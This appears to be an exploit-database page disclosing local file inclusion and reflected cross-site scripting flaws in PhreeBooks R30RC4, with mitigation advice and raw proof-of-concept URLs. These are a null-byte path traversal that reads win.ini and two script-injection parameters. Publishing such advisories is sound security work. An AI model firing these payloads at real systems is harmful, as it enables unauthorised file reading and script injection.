header-logo
Suggest Exploit
vendor:
PhreeBooks R30RC4
by:
AutoSec Tools
8.8
CVSS
HIGH
Local File Inclusion and Reflected Cross-site Scripting
98, 79
CWE
Product Name: PhreeBooks R30RC4
Affected Version From: PhreeBooks R30RC4
Affected Version To: PhreeBooks R30RC4
Patch Exists: NO
Related CWE: N/A
CPE: a:phreebooks:phreebooks_r30rc4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista + XAMPP
2011

PhreeBooks R30RC4 Local File Inclusion and Reflected Cross-site Scripting

PhreeBooks R30RC4 is vulnerable to Local File Inclusion and Reflected Cross-site Scripting. An attacker can exploit this vulnerability by sending a maliciously crafted URL to the target server. The malicious URL contains a malicious script which is then executed by the web server. The malicious script can be used to steal sensitive information or execute arbitrary code on the target server.

Mitigation:

To mitigate this vulnerability, the application should be configured to only allow access to files that are necessary for the application to function. Additionally, input validation should be performed to ensure that user-supplied data is not used to access files outside of the application's directory structure.
Source

Exploit-DB raw data:

------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Local File Inclusion
Download................http://sourceforge.net/projects/phreebooks
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--PoC--
http://localhost/phreedom/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2fwin.ini%00


------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Reflected Cross-site Scripting
Download................http://sourceforge.net/projects/phreebooks
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--PoC--
http://localhost/phreedom/modules/shipping/pages/popup_shipping/js_include.php?form=';alert(0)%3C/script%3E

http://localhost/phreedom/modules/shipping/methods/fedex_v7/label_mgr/js_include.php?form=%22;alert(0)%3C/script%3E

Navigation

Suggest Exploit

Services By CQR